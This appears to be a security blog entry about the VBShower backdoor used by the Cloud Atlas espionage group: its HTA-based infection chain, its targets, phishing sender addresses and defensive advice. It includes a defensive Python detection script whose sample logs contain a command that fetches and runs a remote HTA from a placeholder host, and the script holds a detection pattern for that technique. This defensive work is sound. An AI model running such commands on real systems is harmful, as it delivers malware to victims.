VBShower

Do you know what VBShower is?

VBShower refers to a series of phishing attacks that are closely related to Cloud Atlas, a group associated with a number of espionage attacks against various countries in several regions. It is common for such actors to change their tooling over time, and VBShower is the newest infection chain that Cloud Atlas uses to attack its targets and steal important information. In this entry, we will tell you more about the malicious campaign, but we will omit the usual manual removal guide because this infection chain is far too sophisticated for it. If your system has been attacked by this malware, it is best to leave it to the professionals.

Security researchers describe VBShower as a “polymorphic” infection chain. The infection relies on a polymorphic HTA, or HTML Application, that is hosted on a remote server. What is an HTA? To put it simply, it is a program whose code consists of HTML together with a scripting language supported by Internet Explorer, such as VBScript or JScript. Because of its nature, an HTA can be executed as a “fully trusted” application, so it is not surprising that cybercrime actors use it to deliver and distribute malware.

As mentioned, to enter the target system, VBShower executes a remote HTA and then uses that application to drop three files on the affected system. VBShower itself functions as a backdoor, and it is launched by a tiny launcher that is dropped as one of those three files. The third file is computed by the HTA, and its job is to log data such as the computer name, the domain, the current user, and the currently active processes.
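As an added example (not code from the original entry or from the researchers it cites), here is a small detection routine a defender could run over process-creation logs to surface the first step of this chain: an HTA launched from a remote URL. It assumes a constructed key=value log format, that HTAs are executed by Windows' mshta.exe, and a hypothetical list of risky parent processes; the sample hosts are placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events in a hypothetical key=value format
# (not from any real incident). 203.0.113.5 and example.net are placeholders.
SAMPLE_LOG = r"""
ts=2019-08-01T09:12:03Z image=C:\Windows\System32\mshta.exe parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" cmdline="mshta.exe http://203.0.113.5/update.hta" user=CORP\jdoe
ts=2019-08-01T09:15:44Z image=C:\Windows\System32\mshta.exe parent=C:\Windows\explorer.exe cmdline="mshta.exe C:\Tools\inventory.hta" user=CORP\admin
ts=2019-08-01T09:16:10Z image=C:\Windows\System32\notepad.exe parent=C:\Windows\explorer.exe cmdline="notepad.exe notes.txt" user=CORP\jdoe
ts=2019-08-01T09:20:31Z image=C:\Windows\System32\mshta.exe parent=C:\Windows\explorer.exe cmdline="mshta.exe https://example.net/x" user=CORP\jdoe
"""

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')   # key="quoted value" or key=bare
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
# Assumed list of parents from which an HTA launch is especially suspicious:
# document readers and script hosts, the usual first stage of a phishing attachment.
RISKY_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                 "wscript.exe", "cscript.exe", "powershell.exe"}

def parse_event(line):
    """Turn one key=value log line into a dict (quoted values may contain spaces)."""
    return {k: (quoted or bare) for k, quoted, bare in FIELD_RE.findall(line)}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return (severity, url) for a remote HTA launch, or None otherwise."""
    if basename(event.get("image", "")) != "mshta.exe":
        return None
    m = URL_RE.search(event.get("cmdline", ""))
    if not m:
        return None  # HTA run from a local path: worth logging, but not this pattern
    severity = "high" if basename(event.get("parent", "")) in RISKY_PARENTS else "medium"
    return severity, m.group(0)

def detect_remote_hta(lines):
    """Scan log lines and return one finding per remote HTA launch."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        hit = classify(event)
        if hit:
            severity, url = hit
            findings.append({"ts": event.get("ts"), "user": event.get("user"),
                             "host": urlparse(url).hostname, "severity": severity})
    return findings

if __name__ == "__main__":
    for finding in detect_remote_hta(SAMPLE_LOG.splitlines()):
        print(finding)
```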

Since Cloud Atlas is most active in Eastern Europe and Central Asia, we can expect VBShower to turn up on computer systems in those regions, too. According to the most recent research, the countries targeted by Cloud Atlas (and consequently VBShower) in 2019 include Russia, Kyrgyzstan, Turkmenistan, Afghanistan, Ukraine, Romania, Turkey, and (surprisingly) Portugal. It goes without saying that such actors usually do not care about individual users. Rather than infecting personal computers, VBShower and Cloud Atlas go after government entities, religious organizations, economic entities, international organizations, and the aerospace industry.

Given the scope of this infection, regular users probably do not even know about VBShower, and there is not much an individual could do if their system were infected with this backdoor. For the most part, it is impossible to tell that you have been infected with a backdoor, because backdoors stay hidden for quite a while. For agencies and government institutions, it is vital to invest in cybersecurity and run regular system scans with licensed antispyware tools, because that is the best way to detect malware as soon as possible, before it manages to steal vital information.

It is also necessary to educate all employees about potential security threats and malware distribution tactics. Since VBShower arrives through phishing attacks, everyone has to learn how to recognize phishing emails and delete them without interacting with their content. For the most part, phishing emails get filtered into the Junk folder, no questions asked. But if one lands in your main inbox, you need to think before opening the attached file or clicking an outgoing link, especially if you do not recognize the sender.

Here is a list of email addresses that the attackers use to distribute VBShower:

infocentre.gov@bk.ru
infocentre.gov@mail.ru
middleeasteye@asia.com
simbf2019@mail.ru
world_overview@politician.com

This is not a full list, and new addresses may appear at any time. As you can see, most of them do not look suspicious, and there is always a chance that a legitimate email account gets hacked and starts sending out phishing messages. The point is that we have to be careful whenever we are about to open attached files on a corporate computer, because you can never know who might target your network.

As mentioned, removing VBShower is a job for a professional. If your organization has an IT department, they have to handle it. Your job is to make sure that all of your data is backed up and that you do not get infected with something that dangerous again.

In non-techie terms:

VBShower is a backdoor used by a notorious group of malware actors that targets government organizations in Central Asia and Eastern Europe. You might not encounter this infection first-hand, but it poses serious threats to multiple organizations. This means that institutions need to step up their cybersecurity game by investing in legitimate antispyware programs and hiring professionals who can help deflect these attacks.